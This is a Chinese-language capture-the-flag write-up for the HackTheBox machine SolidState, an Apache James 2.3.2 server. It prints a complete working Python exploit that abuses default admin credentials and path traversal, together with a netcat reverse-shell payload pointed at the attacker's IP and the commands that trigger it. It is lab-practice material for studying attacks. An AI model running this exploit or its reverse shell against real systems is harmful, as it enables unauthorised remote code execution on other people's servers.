本篇文章僅用於技術交流學習和研究的目的，嚴禁使用文章中的技術用於非法目的和破壞，否則造成一切後果與發表本文章的作者無關

靶機是作者購買VIP使用退役靶機操作，顯示IP地址為10.10.10.51

本次使用https://github.com/Tib3rius/AutoRecon 進行自動化全方位掃描

執行命令

autorecon 10.10.10.51 -o ./solidstate-autorecon

發現開放了4555埠，對應的服務是jame-admin 存在遠端程式碼執行漏洞

對應exploit程式碼：https://www.exploit-db.com/exploits/35513

#!/usr/bin/python
 

#
# Exploit Title: Apache James Server 2.3.2 Authenticated User Remote Command Execution
# Date: 16\10\2014
# Exploit Author: Jakub Palaczynski, Marcin Woloszyn, Maciej Grabiec
# Vendor Homepage: http://james.apache.org/server/
# Software Link: http://ftp.ps.pl/pub/apache/james/server/apache-james-2.3.2.zip
# Version: Apache James Server 2.3.2
 

# Tested on: Ubuntu, Debian
# Info: This exploit works on default installation of Apache James Server 2.3.2
# Info: Example paths that will automatically execute payload on some action: /etc/bash_completion.d , /etc/pm/config.d

import socket
import sys
import time

# specify payload
#payload = 'touch /tmp/proof.txt' # to exploit on any user
 

#payload = '[ "$(id -u)" == "0" ] && touch /root/proof.txt' # to exploit only on root
payload = 'nc -e /bin/bash 10.10.14.5 8833' # to exploit only on root
# credentials to James Remote Administration Tool (Default - root/root)
user = 'root'
pwd = 'root'

if len(sys.argv) != 2:
    sys.stderr.write("[-]Usage: python %s <ip>\n" % sys.argv[0])
    sys.stderr.write("[-]Exemple: python %s 127.0.0.1\n" % sys.argv[0])
    sys.exit(1)

ip = sys.argv[1]

def recv(s):
        s.recv(1024)
        time.sleep(0.2)

try:
    print "[+]Connecting to James Remote Administration Tool..."
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((ip,4555))
    s.recv(1024)
    s.send(user + "\n")
    s.recv(1024)
    s.send(pwd + "\n")
    s.recv(1024)
    print "[+]Creating user..."
    s.send("adduser ../../../../../../../../etc/bash_completion.d exploit\n")
    s.recv(1024)
    s.send("quit\n")
    s.close()

    print "[+]Connecting to James SMTP server..."
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((ip,25))
    s.send("ehlo [email protected]\r\n")
    recv(s)
    print "[+]Sending payload..."
    s.send("mail from: <'@team.pl>\r\n")
    recv(s)
    # also try s.send("rcpt to: <../../../../../../../../etc/bash_completion.d@hostname>\r\n") if the recipient cannot be found
    s.send("rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n")
    recv(s)
    s.send("data\r\n")
    recv(s)
    s.send("From: [email protected]\r\n")
    s.send("\r\n")
    s.send("'\n")
    s.send(payload + "\n")
    s.send("\r\n.\r\n")
    recv(s)
    s.send("quit\r\n")
    recv(s)
    s.close()
    print "[+]Done! Payload will be executed once somebody logs in."
except:
    print "Connection failed."

利用方式：

對應的exploit需要更改的就是payload更改為：'nc -e /bin/bash 10.10.14.5 8833' 然後本地kali監聽埠8833

執行1：python 35513.py 10.10.10.51

執行2：ssh 10.10.10.51 -l mindy

密碼隨便輸入，完成之後，等待nc成功接收的反彈shell即可

此靶機跟我之前做的vulnhub是一模一樣，對應的手動操作連結：https://www.cnblogs.com/autopwn/p/13809602.html

PS：本靶機的利用方式跟我做vulnhub的利用方式是一樣的，只是當時做vulnhub的時候以為要先重置密碼，待密碼正確之後再利用此漏洞，但是此時我做htb的靶機發現不需要，可以隨便輸入密碼即可觸發漏洞，所以，大家可以自行測試驗證